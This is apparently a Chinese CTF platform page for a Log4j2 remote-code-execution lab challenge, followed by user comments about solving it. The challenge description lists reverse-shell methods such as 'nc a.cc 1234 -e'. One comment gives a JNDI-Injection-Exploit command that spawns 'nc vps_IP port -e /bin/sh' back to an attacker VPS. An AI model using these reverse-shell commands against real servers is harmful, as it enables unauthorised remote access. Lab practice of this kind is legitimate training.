Apache Log4j2 RCEWEB 未解决

分数: 25 金币: 3
题目作者: 云牧青
一  血: yeedo
一血奖励: 8金币
解  决: 563
提  示: 人太多了服务器性能有点满了,启动不起来的 过一会再启动就可以了。
描  述:
/bin/bash:x ; /bin/sh √ ; /dev/tcp × ; nc -e x ; nc a.cc 1234 -e √ ;
评论
ctfliu 3年前

不懂,跟着流程走的。阿里云开启虚拟linux,在安全组规则放开所有端口。根据别人的wp走就行。

回复 0

xiaopengy 3年前

请问反弹shell的时候vps端为什么报这个错? 我的vps机是kali的系统。 java.lang.IllegalAccessError: superclass access check failed: class com.feihong.ldap.template.TomcatEchoTemplate (in unnamed module @0x5e91993f) cannot access

回复 0

Striker123456 3年前

弹回的shell执行不了命令,不知道是不是我的服务器的问题

回复 0

jack12138 3年前

dnslog出不来,但是可以弹shell,估计是禁用dns请求啦?

回复 1
Wencf01 2年前

我也是能弹shell,但是弹不dnslog

回复 0

Striker123456 3年前

必须要外网的VPS么

回复 0
Striker123456 3年前

@简单的很遗憾 哎哎,我的意思是公网地址的VPS也可以把

回复 0

简单的很遗憾 3年前

这个是需要的,没有vps可以vulhub本地复现嘛

回复 1

1317554973 3年前

什么靶场啊 我都用了6金币都没成功 我百度上找一个靶场就直接成功了 骗我金币 搞毛啊

回复 0

13633953641aaa 3年前

有没有师傅遇到vps开启ldap后 telnet -p 不通的问题

回复 0

SecI302 3年前

1.通过ceye是无法判断是否存在漏洞的,但是能正常反弹shell 2.下载JNDI注入工具 3. 启动工具命令java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "nc vps_IP port -e /bin/sh" -A vps_IP启动rmi或者ldap服务设置IP工具会返回服务地址的(红色的) 4.复

回复 0

mamba24 3年前

最后一步了 端口都是通的 就是弹不回来

回复 0

丶我亚索贼六 3年前

https://blog.csdn.net/kukudeshuo/article/details/122034507 跟着来就可以了 注意自己的端口

回复 3

WriteUp

image
18634648362

6 金币

评分(6)

解题动态

暗流安全 攻破了该题 9天前
枪王小弟 攻破了该题 17天前
老兵烧烤 攻破了该题 17天前
蓝色 攻破了该题 18天前
aqwzaa 攻破了该题 20天前
dlgz 攻破了该题 21天前
kr2yh 攻破了该题 1月前
Arno_Zoffy 攻破了该题 2月前
ykssorin 攻破了该题 2月前
Aromatic 攻破了该题 2月前
小马哥 攻破了该题 2月前
jerryxucy 攻破了该题 2月前
w111 攻破了该题 2月前
bin7 攻破了该题 4月前
t0ur1st 攻破了该题 4月前
geri 攻破了该题 4月前
SkyAsh 攻破了该题 4月前
她说我们只是朋友 攻破了该题 4月前
网恋秀牛子被录屏导致自卑 攻破了该题 5月前
yuuwt 攻破了该题 5月前
问题反馈